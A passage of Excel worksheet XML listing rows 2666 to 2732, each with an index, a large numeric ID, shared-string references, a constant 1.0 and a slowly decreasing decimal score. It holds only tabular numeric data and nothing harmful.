    <row r="2666" ht="15.75" customHeight="1">
      <c r="A2666" s="1">
        <v>1225.0</v>
      </c>
      <c r="B2666" s="2">
        <v>2.4963654E7</v>
      </c>
      <c r="C2666" s="2" t="s">
        <v>2477</v>
      </c>
      <c r="D2666" s="2">
        <v>1.0</v>
      </c>
      <c r="E2666" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2666" s="2">
        <v>0.1735042735042735</v>
      </c>
    </row>
    <row r="2667" ht="15.75" customHeight="1">
      <c r="A2667" s="1">
        <v>12526.0</v>
      </c>
      <c r="B2667" s="2">
        <v>2.9720451E7</v>
      </c>
      <c r="C2667" s="2" t="s">
        <v>2478</v>
      </c>
      <c r="D2667" s="2">
        <v>1.0</v>
      </c>
      <c r="E2667" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2667" s="2">
        <v>0.1733001658374793</v>
      </c>
    </row>
    <row r="2668" ht="15.75" customHeight="1">
      <c r="A2668" s="1">
        <v>13972.0</v>
      </c>
      <c r="B2668" s="2">
        <v>3.7333241E7</v>
      </c>
      <c r="C2668" s="2" t="s">
        <v>2479</v>
      </c>
      <c r="D2668" s="2">
        <v>1.0</v>
      </c>
      <c r="E2668" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2668" s="2">
        <v>0.1729390681003585</v>
      </c>
    </row>
    <row r="2669" ht="15.75" customHeight="1">
      <c r="A2669" s="1">
        <v>12245.0</v>
      </c>
      <c r="B2669" s="2">
        <v>2.7893586E7</v>
      </c>
      <c r="C2669" s="2" t="s">
        <v>2480</v>
      </c>
      <c r="D2669" s="2">
        <v>1.0</v>
      </c>
      <c r="E2669" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2669" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="2670" ht="15.75" customHeight="1">
      <c r="A2670" s="1">
        <v>14160.0</v>
      </c>
      <c r="B2670" s="2">
        <v>3.8011348E7</v>
      </c>
      <c r="C2670" s="2" t="s">
        <v>2481</v>
      </c>
      <c r="D2670" s="2">
        <v>1.0</v>
      </c>
      <c r="E2670" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2670" s="2">
        <v>0.1722925457102673</v>
      </c>
    </row>
    <row r="2671" ht="15.75" customHeight="1">
      <c r="A2671" s="1">
        <v>9351.0</v>
      </c>
      <c r="B2671" s="2">
        <v>5.5667334E7</v>
      </c>
      <c r="C2671" s="2" t="s">
        <v>2482</v>
      </c>
      <c r="D2671" s="2">
        <v>1.0</v>
      </c>
      <c r="E2671" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2671" s="2">
        <v>0.1721311475409837</v>
      </c>
    </row>
    <row r="2672" ht="15.75" customHeight="1">
      <c r="A2672" s="1">
        <v>6481.0</v>
      </c>
      <c r="B2672" s="2">
        <v>4.8667357E7</v>
      </c>
      <c r="C2672" s="2" t="s">
        <v>2483</v>
      </c>
      <c r="D2672" s="2">
        <v>1.0</v>
      </c>
      <c r="E2672" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2672" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="2673" ht="15.75" customHeight="1">
      <c r="A2673" s="1">
        <v>3356.0</v>
      </c>
      <c r="B2673" s="2">
        <v>3.7823108E7</v>
      </c>
      <c r="C2673" s="2" t="s">
        <v>2484</v>
      </c>
      <c r="D2673" s="2">
        <v>1.0</v>
      </c>
      <c r="E2673" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2673" s="2">
        <v>0.1706349206349207</v>
      </c>
    </row>
    <row r="2674" ht="15.75" customHeight="1">
      <c r="A2674" s="1">
        <v>2000.0</v>
      </c>
      <c r="B2674" s="2">
        <v>3.0586884E7</v>
      </c>
      <c r="C2674" s="2" t="s">
        <v>2485</v>
      </c>
      <c r="D2674" s="2">
        <v>1.0</v>
      </c>
      <c r="E2674" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2674" s="2">
        <v>0.1704119850187266</v>
      </c>
    </row>
    <row r="2675" ht="15.75" customHeight="1">
      <c r="A2675" s="1">
        <v>18645.0</v>
      </c>
      <c r="B2675" s="2">
        <v>5.3432006E7</v>
      </c>
      <c r="C2675" s="2" t="s">
        <v>2486</v>
      </c>
      <c r="D2675" s="2">
        <v>1.0</v>
      </c>
      <c r="E2675" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2675" s="2">
        <v>0.1696859903381643</v>
      </c>
    </row>
    <row r="2676" ht="15.75" customHeight="1">
      <c r="A2676" s="1">
        <v>9297.0</v>
      </c>
      <c r="B2676" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C2676" s="2" t="s">
        <v>2487</v>
      </c>
      <c r="D2676" s="2">
        <v>1.0</v>
      </c>
      <c r="E2676" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2676" s="2">
        <v>0.1695402298850575</v>
      </c>
    </row>
    <row r="2677" ht="15.75" customHeight="1">
      <c r="A2677" s="1">
        <v>10158.0</v>
      </c>
      <c r="B2677" s="2">
        <v>5.7327653E7</v>
      </c>
      <c r="C2677" s="2" t="s">
        <v>2488</v>
      </c>
      <c r="D2677" s="2">
        <v>1.0</v>
      </c>
      <c r="E2677" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2677" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="2678" ht="15.75" customHeight="1">
      <c r="A2678" s="1">
        <v>11973.0</v>
      </c>
      <c r="B2678" s="2">
        <v>2.5755069E7</v>
      </c>
      <c r="C2678" s="2" t="s">
        <v>2489</v>
      </c>
      <c r="D2678" s="2">
        <v>1.0</v>
      </c>
      <c r="E2678" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2678" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="2679" ht="15.75" customHeight="1">
      <c r="A2679" s="1">
        <v>17361.0</v>
      </c>
      <c r="B2679" s="2">
        <v>4.946491E7</v>
      </c>
      <c r="C2679" s="2" t="s">
        <v>2490</v>
      </c>
      <c r="D2679" s="2">
        <v>1.0</v>
      </c>
      <c r="E2679" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2679" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="2680" ht="15.75" customHeight="1">
      <c r="A2680" s="1">
        <v>7851.0</v>
      </c>
      <c r="B2680" s="2">
        <v>5.2344777E7</v>
      </c>
      <c r="C2680" s="2" t="s">
        <v>2491</v>
      </c>
      <c r="D2680" s="2">
        <v>1.0</v>
      </c>
      <c r="E2680" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2680" s="2">
        <v>0.1693548387096775</v>
      </c>
    </row>
    <row r="2681" ht="15.75" customHeight="1">
      <c r="A2681" s="1">
        <v>1270.0</v>
      </c>
      <c r="B2681" s="2">
        <v>2.5278208E7</v>
      </c>
      <c r="C2681" s="2" t="s">
        <v>2492</v>
      </c>
      <c r="D2681" s="2">
        <v>1.0</v>
      </c>
      <c r="E2681" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2681" s="2">
        <v>0.1689814814814815</v>
      </c>
    </row>
    <row r="2682" ht="15.75" customHeight="1">
      <c r="A2682" s="1">
        <v>1984.0</v>
      </c>
      <c r="B2682" s="2">
        <v>3.0487827E7</v>
      </c>
      <c r="C2682" s="2" t="s">
        <v>2493</v>
      </c>
      <c r="D2682" s="2">
        <v>1.0</v>
      </c>
      <c r="E2682" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2682" s="2">
        <v>0.1682769726247988</v>
      </c>
    </row>
    <row r="2683" ht="15.75" customHeight="1">
      <c r="A2683" s="1">
        <v>1440.0</v>
      </c>
      <c r="B2683" s="2">
        <v>2.6701633E7</v>
      </c>
      <c r="C2683" s="2" t="s">
        <v>2494</v>
      </c>
      <c r="D2683" s="2">
        <v>1.0</v>
      </c>
      <c r="E2683" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2683" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="2684" ht="15.75" customHeight="1">
      <c r="A2684" s="1">
        <v>2541.0</v>
      </c>
      <c r="B2684" s="2">
        <v>3.4110061E7</v>
      </c>
      <c r="C2684" s="2" t="s">
        <v>2495</v>
      </c>
      <c r="D2684" s="2">
        <v>1.0</v>
      </c>
      <c r="E2684" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2684" s="2">
        <v>0.167562724014337</v>
      </c>
    </row>
    <row r="2685" ht="15.75" customHeight="1">
      <c r="A2685" s="1">
        <v>2947.0</v>
      </c>
      <c r="B2685" s="2">
        <v>3.5998907E7</v>
      </c>
      <c r="C2685" s="2" t="s">
        <v>2496</v>
      </c>
      <c r="D2685" s="2">
        <v>1.0</v>
      </c>
      <c r="E2685" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2685" s="2">
        <v>0.167562724014337</v>
      </c>
    </row>
    <row r="2686" ht="15.75" customHeight="1">
      <c r="A2686" s="1">
        <v>1654.0</v>
      </c>
      <c r="B2686" s="2">
        <v>2.8119219E7</v>
      </c>
      <c r="C2686" s="2" t="s">
        <v>2497</v>
      </c>
      <c r="D2686" s="2">
        <v>1.0</v>
      </c>
      <c r="E2686" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2686" s="2">
        <v>0.1675084175084176</v>
      </c>
    </row>
    <row r="2687" ht="15.75" customHeight="1">
      <c r="A2687" s="1">
        <v>8152.0</v>
      </c>
      <c r="B2687" s="2">
        <v>5.3174399E7</v>
      </c>
      <c r="C2687" s="2" t="s">
        <v>2498</v>
      </c>
      <c r="D2687" s="2">
        <v>1.0</v>
      </c>
      <c r="E2687" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2687" s="2">
        <v>0.1670692431561996</v>
      </c>
    </row>
    <row r="2688" ht="15.75" customHeight="1">
      <c r="A2688" s="1">
        <v>3997.0</v>
      </c>
      <c r="B2688" s="2">
        <v>4.0883082E7</v>
      </c>
      <c r="C2688" s="2" t="s">
        <v>2499</v>
      </c>
      <c r="D2688" s="2">
        <v>1.0</v>
      </c>
      <c r="E2688" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2688" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="2689" ht="15.75" customHeight="1">
      <c r="A2689" s="1">
        <v>5621.0</v>
      </c>
      <c r="B2689" s="2">
        <v>4.6181521E7</v>
      </c>
      <c r="C2689" s="2" t="s">
        <v>2500</v>
      </c>
      <c r="D2689" s="2">
        <v>1.0</v>
      </c>
      <c r="E2689" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2689" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="2690" ht="15.75" customHeight="1">
      <c r="A2690" s="1">
        <v>12930.0</v>
      </c>
      <c r="B2690" s="2">
        <v>3.2329152E7</v>
      </c>
      <c r="C2690" s="2" t="s">
        <v>2501</v>
      </c>
      <c r="D2690" s="2">
        <v>1.0</v>
      </c>
      <c r="E2690" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2690" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="2691" ht="15.75" customHeight="1">
      <c r="A2691" s="1">
        <v>14219.0</v>
      </c>
      <c r="B2691" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C2691" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="D2691" s="2">
        <v>1.0</v>
      </c>
      <c r="E2691" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2691" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="2692" ht="15.75" customHeight="1">
      <c r="A2692" s="1">
        <v>17096.0</v>
      </c>
      <c r="B2692" s="2">
        <v>4.8668498E7</v>
      </c>
      <c r="C2692" s="2" t="s">
        <v>2503</v>
      </c>
      <c r="D2692" s="2">
        <v>1.0</v>
      </c>
      <c r="E2692" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2692" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="2693" ht="15.75" customHeight="1">
      <c r="A2693" s="1">
        <v>19312.0</v>
      </c>
      <c r="B2693" s="2">
        <v>5.5285853E7</v>
      </c>
      <c r="C2693" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="D2693" s="2">
        <v>1.0</v>
      </c>
      <c r="E2693" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2693" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="2694" ht="15.75" customHeight="1">
      <c r="A2694" s="1">
        <v>16724.0</v>
      </c>
      <c r="B2694" s="2">
        <v>4.7477612E7</v>
      </c>
      <c r="C2694" s="2" t="s">
        <v>2505</v>
      </c>
      <c r="D2694" s="2">
        <v>1.0</v>
      </c>
      <c r="E2694" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2694" s="2">
        <v>0.1659159159159159</v>
      </c>
    </row>
    <row r="2695" ht="15.75" customHeight="1">
      <c r="A2695" s="1">
        <v>9301.0</v>
      </c>
      <c r="B2695" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C2695" s="2" t="s">
        <v>2487</v>
      </c>
      <c r="D2695" s="2">
        <v>1.0</v>
      </c>
      <c r="E2695" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2695" s="2">
        <v>0.1657088122605364</v>
      </c>
    </row>
    <row r="2696" ht="15.75" customHeight="1">
      <c r="A2696" s="1">
        <v>17370.0</v>
      </c>
      <c r="B2696" s="2">
        <v>4.9501234E7</v>
      </c>
      <c r="C2696" s="2" t="s">
        <v>2506</v>
      </c>
      <c r="D2696" s="2">
        <v>1.0</v>
      </c>
      <c r="E2696" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2696" s="2">
        <v>0.1652601969057666</v>
      </c>
    </row>
    <row r="2697" ht="15.75" customHeight="1">
      <c r="A2697" s="1">
        <v>2070.0</v>
      </c>
      <c r="B2697" s="2">
        <v>3.1093891E7</v>
      </c>
      <c r="C2697" s="2" t="s">
        <v>2507</v>
      </c>
      <c r="D2697" s="2">
        <v>1.0</v>
      </c>
      <c r="E2697" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2697" s="2">
        <v>0.1651017214397497</v>
      </c>
    </row>
    <row r="2698" ht="15.75" customHeight="1">
      <c r="A2698" s="1">
        <v>3996.0</v>
      </c>
      <c r="B2698" s="2">
        <v>4.0883082E7</v>
      </c>
      <c r="C2698" s="2" t="s">
        <v>2508</v>
      </c>
      <c r="D2698" s="2">
        <v>1.0</v>
      </c>
      <c r="E2698" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2698" s="2">
        <v>0.1650563607085346</v>
      </c>
    </row>
    <row r="2699" ht="15.75" customHeight="1">
      <c r="A2699" s="1">
        <v>1378.0</v>
      </c>
      <c r="B2699" s="2">
        <v>2.6085289E7</v>
      </c>
      <c r="C2699" s="2" t="s">
        <v>2509</v>
      </c>
      <c r="D2699" s="2">
        <v>1.0</v>
      </c>
      <c r="E2699" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2699" s="2">
        <v>0.1649029982363317</v>
      </c>
    </row>
    <row r="2700" ht="15.75" customHeight="1">
      <c r="A2700" s="1">
        <v>7819.0</v>
      </c>
      <c r="B2700" s="2">
        <v>5.2282501E7</v>
      </c>
      <c r="C2700" s="2" t="s">
        <v>2510</v>
      </c>
      <c r="D2700" s="2">
        <v>1.0</v>
      </c>
      <c r="E2700" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2700" s="2">
        <v>0.1649029982363317</v>
      </c>
    </row>
    <row r="2701" ht="15.75" customHeight="1">
      <c r="A2701" s="1">
        <v>10963.0</v>
      </c>
      <c r="B2701" s="2">
        <v>1.7186614E7</v>
      </c>
      <c r="C2701" s="2" t="s">
        <v>2511</v>
      </c>
      <c r="D2701" s="2">
        <v>1.0</v>
      </c>
      <c r="E2701" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2701" s="2">
        <v>0.1649029982363316</v>
      </c>
    </row>
    <row r="2702" ht="15.75" customHeight="1">
      <c r="A2702" s="1">
        <v>19036.0</v>
      </c>
      <c r="B2702" s="2">
        <v>5.4560817E7</v>
      </c>
      <c r="C2702" s="2" t="s">
        <v>2512</v>
      </c>
      <c r="D2702" s="2">
        <v>1.0</v>
      </c>
      <c r="E2702" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2702" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="2703" ht="15.75" customHeight="1">
      <c r="A2703" s="1">
        <v>16023.0</v>
      </c>
      <c r="B2703" s="2">
        <v>4.5076963E7</v>
      </c>
      <c r="C2703" s="2" t="s">
        <v>2513</v>
      </c>
      <c r="D2703" s="2">
        <v>1.0</v>
      </c>
      <c r="E2703" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2703" s="2">
        <v>0.164783427495292</v>
      </c>
    </row>
    <row r="2704" ht="15.75" customHeight="1">
      <c r="A2704" s="1">
        <v>6784.0</v>
      </c>
      <c r="B2704" s="2">
        <v>4.9483388E7</v>
      </c>
      <c r="C2704" s="2" t="s">
        <v>2514</v>
      </c>
      <c r="D2704" s="2">
        <v>1.0</v>
      </c>
      <c r="E2704" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2704" s="2">
        <v>0.1644144144144144</v>
      </c>
    </row>
    <row r="2705" ht="15.75" customHeight="1">
      <c r="A2705" s="1">
        <v>2223.0</v>
      </c>
      <c r="B2705" s="2">
        <v>3.2194264E7</v>
      </c>
      <c r="C2705" s="2" t="s">
        <v>2515</v>
      </c>
      <c r="D2705" s="2">
        <v>1.0</v>
      </c>
      <c r="E2705" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2705" s="2">
        <v>0.1643518518518519</v>
      </c>
    </row>
    <row r="2706" ht="15.75" customHeight="1">
      <c r="A2706" s="1">
        <v>10741.0</v>
      </c>
      <c r="B2706" s="2">
        <v>1.5375003E7</v>
      </c>
      <c r="C2706" s="2" t="s">
        <v>2516</v>
      </c>
      <c r="D2706" s="2">
        <v>1.0</v>
      </c>
      <c r="E2706" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2706" s="2">
        <v>0.1642857142857143</v>
      </c>
    </row>
    <row r="2707" ht="15.75" customHeight="1">
      <c r="A2707" s="1">
        <v>9807.0</v>
      </c>
      <c r="B2707" s="2">
        <v>5.6581609E7</v>
      </c>
      <c r="C2707" s="2" t="s">
        <v>2517</v>
      </c>
      <c r="D2707" s="2">
        <v>1.0</v>
      </c>
      <c r="E2707" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2707" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="2708" ht="15.75" customHeight="1">
      <c r="A2708" s="1">
        <v>14227.0</v>
      </c>
      <c r="B2708" s="2">
        <v>3.8286053E7</v>
      </c>
      <c r="C2708" s="2" t="s">
        <v>2518</v>
      </c>
      <c r="D2708" s="2">
        <v>1.0</v>
      </c>
      <c r="E2708" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2708" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="2709" ht="15.75" customHeight="1">
      <c r="A2709" s="1">
        <v>29268.0</v>
      </c>
      <c r="B2709" s="2">
        <v>3.0991304E7</v>
      </c>
      <c r="C2709" s="2" t="s">
        <v>2519</v>
      </c>
      <c r="D2709" s="2">
        <v>1.0</v>
      </c>
      <c r="E2709" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2709" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="2710" ht="15.75" customHeight="1">
      <c r="A2710" s="1">
        <v>15513.0</v>
      </c>
      <c r="B2710" s="2">
        <v>4.3269322E7</v>
      </c>
      <c r="C2710" s="2" t="s">
        <v>2520</v>
      </c>
      <c r="D2710" s="2">
        <v>1.0</v>
      </c>
      <c r="E2710" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2710" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="2711" ht="15.75" customHeight="1">
      <c r="A2711" s="1">
        <v>10174.0</v>
      </c>
      <c r="B2711" s="2">
        <v>5.7378009E7</v>
      </c>
      <c r="C2711" s="2" t="s">
        <v>2521</v>
      </c>
      <c r="D2711" s="2">
        <v>1.0</v>
      </c>
      <c r="E2711" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2711" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="2712" ht="15.75" customHeight="1">
      <c r="A2712" s="1">
        <v>11339.0</v>
      </c>
      <c r="B2712" s="2">
        <v>2.1207459E7</v>
      </c>
      <c r="C2712" s="2" t="s">
        <v>2522</v>
      </c>
      <c r="D2712" s="2">
        <v>1.0</v>
      </c>
      <c r="E2712" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2712" s="2">
        <v>0.1636904761904762</v>
      </c>
    </row>
    <row r="2713" ht="15.75" customHeight="1">
      <c r="A2713" s="1">
        <v>6907.0</v>
      </c>
      <c r="B2713" s="2">
        <v>4.982219E7</v>
      </c>
      <c r="C2713" s="2" t="s">
        <v>2523</v>
      </c>
      <c r="D2713" s="2">
        <v>1.0</v>
      </c>
      <c r="E2713" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2713" s="2">
        <v>0.1636225266362253</v>
      </c>
    </row>
    <row r="2714" ht="15.75" customHeight="1">
      <c r="A2714" s="1">
        <v>4045.0</v>
      </c>
      <c r="B2714" s="2">
        <v>4.1066449E7</v>
      </c>
      <c r="C2714" s="2" t="s">
        <v>2524</v>
      </c>
      <c r="D2714" s="2">
        <v>1.0</v>
      </c>
      <c r="E2714" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2714" s="2">
        <v>0.1631393298059965</v>
      </c>
    </row>
    <row r="2715" ht="15.75" customHeight="1">
      <c r="A2715" s="1">
        <v>14570.0</v>
      </c>
      <c r="B2715" s="2">
        <v>4.0063987E7</v>
      </c>
      <c r="C2715" s="2" t="s">
        <v>2525</v>
      </c>
      <c r="D2715" s="2">
        <v>1.0</v>
      </c>
      <c r="E2715" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2715" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="2716" ht="15.75" customHeight="1">
      <c r="A2716" s="1">
        <v>10395.0</v>
      </c>
      <c r="B2716" s="2">
        <v>915904.0</v>
      </c>
      <c r="C2716" s="2" t="s">
        <v>2526</v>
      </c>
      <c r="D2716" s="2">
        <v>1.0</v>
      </c>
      <c r="E2716" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2716" s="2">
        <v>0.1629001883239172</v>
      </c>
    </row>
    <row r="2717" ht="15.75" customHeight="1">
      <c r="A2717" s="1">
        <v>11507.0</v>
      </c>
      <c r="B2717" s="2">
        <v>2.2163299E7</v>
      </c>
      <c r="C2717" s="2" t="s">
        <v>2527</v>
      </c>
      <c r="D2717" s="2">
        <v>1.0</v>
      </c>
      <c r="E2717" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2717" s="2">
        <v>0.1625816993464052</v>
      </c>
    </row>
    <row r="2718" ht="15.75" customHeight="1">
      <c r="A2718" s="1">
        <v>3867.0</v>
      </c>
      <c r="B2718" s="2">
        <v>4.0329895E7</v>
      </c>
      <c r="C2718" s="2" t="s">
        <v>2528</v>
      </c>
      <c r="D2718" s="2">
        <v>1.0</v>
      </c>
      <c r="E2718" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2718" s="2">
        <v>0.1618357487922706</v>
      </c>
    </row>
    <row r="2719" ht="15.75" customHeight="1">
      <c r="A2719" s="1">
        <v>15984.0</v>
      </c>
      <c r="B2719" s="2">
        <v>4.4915656E7</v>
      </c>
      <c r="C2719" s="2" t="s">
        <v>2529</v>
      </c>
      <c r="D2719" s="2">
        <v>1.0</v>
      </c>
      <c r="E2719" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2719" s="2">
        <v>0.1617063492063493</v>
      </c>
    </row>
    <row r="2720" ht="15.75" customHeight="1">
      <c r="A2720" s="1">
        <v>4946.0</v>
      </c>
      <c r="B2720" s="2">
        <v>4.4047019E7</v>
      </c>
      <c r="C2720" s="2" t="s">
        <v>2530</v>
      </c>
      <c r="D2720" s="2">
        <v>1.0</v>
      </c>
      <c r="E2720" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2720" s="2">
        <v>0.1616915422885573</v>
      </c>
    </row>
    <row r="2721" ht="15.75" customHeight="1">
      <c r="A2721" s="1">
        <v>3410.0</v>
      </c>
      <c r="B2721" s="2">
        <v>3.8071631E7</v>
      </c>
      <c r="C2721" s="2" t="s">
        <v>2531</v>
      </c>
      <c r="D2721" s="2">
        <v>1.0</v>
      </c>
      <c r="E2721" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2721" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="2722" ht="15.75" customHeight="1">
      <c r="A2722" s="1">
        <v>16666.0</v>
      </c>
      <c r="B2722" s="2">
        <v>4.7252241E7</v>
      </c>
      <c r="C2722" s="2" t="s">
        <v>2532</v>
      </c>
      <c r="D2722" s="2">
        <v>1.0</v>
      </c>
      <c r="E2722" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2722" s="2">
        <v>0.1613756613756615</v>
      </c>
    </row>
    <row r="2723" ht="15.75" customHeight="1">
      <c r="A2723" s="1">
        <v>14837.0</v>
      </c>
      <c r="B2723" s="2">
        <v>4.1028474E7</v>
      </c>
      <c r="C2723" s="2" t="s">
        <v>2533</v>
      </c>
      <c r="D2723" s="2">
        <v>1.0</v>
      </c>
      <c r="E2723" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2723" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="2724" ht="15.75" customHeight="1">
      <c r="A2724" s="1">
        <v>7319.0</v>
      </c>
      <c r="B2724" s="2">
        <v>5.0887451E7</v>
      </c>
      <c r="C2724" s="2" t="s">
        <v>2534</v>
      </c>
      <c r="D2724" s="2">
        <v>1.0</v>
      </c>
      <c r="E2724" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2724" s="2">
        <v>0.1610407876230661</v>
      </c>
    </row>
    <row r="2725" ht="15.75" customHeight="1">
      <c r="A2725" s="1">
        <v>15491.0</v>
      </c>
      <c r="B2725" s="2">
        <v>4.3197587E7</v>
      </c>
      <c r="C2725" s="2" t="s">
        <v>2535</v>
      </c>
      <c r="D2725" s="2">
        <v>1.0</v>
      </c>
      <c r="E2725" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2725" s="2">
        <v>0.1610169491525424</v>
      </c>
    </row>
    <row r="2726" ht="15.75" customHeight="1">
      <c r="A2726" s="1">
        <v>1876.0</v>
      </c>
      <c r="B2726" s="2">
        <v>2.9667278E7</v>
      </c>
      <c r="C2726" s="2" t="s">
        <v>2536</v>
      </c>
      <c r="D2726" s="2">
        <v>1.0</v>
      </c>
      <c r="E2726" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2726" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="2727" ht="15.75" customHeight="1">
      <c r="A2727" s="1">
        <v>9640.0</v>
      </c>
      <c r="B2727" s="2">
        <v>5.6238214E7</v>
      </c>
      <c r="C2727" s="2" t="s">
        <v>2537</v>
      </c>
      <c r="D2727" s="2">
        <v>1.0</v>
      </c>
      <c r="E2727" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2727" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="2728" ht="15.75" customHeight="1">
      <c r="A2728" s="1">
        <v>10557.0</v>
      </c>
      <c r="B2728" s="2">
        <v>1.2677765E7</v>
      </c>
      <c r="C2728" s="2" t="s">
        <v>2538</v>
      </c>
      <c r="D2728" s="2">
        <v>1.0</v>
      </c>
      <c r="E2728" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2728" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="2729" ht="15.75" customHeight="1">
      <c r="A2729" s="1">
        <v>12308.0</v>
      </c>
      <c r="B2729" s="2">
        <v>2.8377496E7</v>
      </c>
      <c r="C2729" s="2" t="s">
        <v>2539</v>
      </c>
      <c r="D2729" s="2">
        <v>1.0</v>
      </c>
      <c r="E2729" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2729" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="2730" ht="15.75" customHeight="1">
      <c r="A2730" s="1">
        <v>18496.0</v>
      </c>
      <c r="B2730" s="2">
        <v>5.2933504E7</v>
      </c>
      <c r="C2730" s="2" t="s">
        <v>2540</v>
      </c>
      <c r="D2730" s="2">
        <v>1.0</v>
      </c>
      <c r="E2730" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2730" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="2731" ht="15.75" customHeight="1">
      <c r="A2731" s="1">
        <v>7557.0</v>
      </c>
      <c r="B2731" s="2">
        <v>5.1539099E7</v>
      </c>
      <c r="C2731" s="2" t="s">
        <v>2541</v>
      </c>
      <c r="D2731" s="2">
        <v>1.0</v>
      </c>
      <c r="E2731" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2731" s="2">
        <v>0.1606060606060606</v>
      </c>
    </row>
    <row r="2732" ht="15.75" customHeight="1">
      <c r="A2732" s="1">
        <v>12323.0</v>
      </c>
      <c r="B2732" s="2">
        <v>2.850002E7</v>
      </c>
      <c r="C2732" s="2" t="s">
        <v>2542</v>
      </c>
      <c r="D2732" s="2">
        <v>1.0</v>
      </c>
      <c r="E2732" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2732" s="2">
        <v>0.1599616858237548</v>
      </c>
    </row>
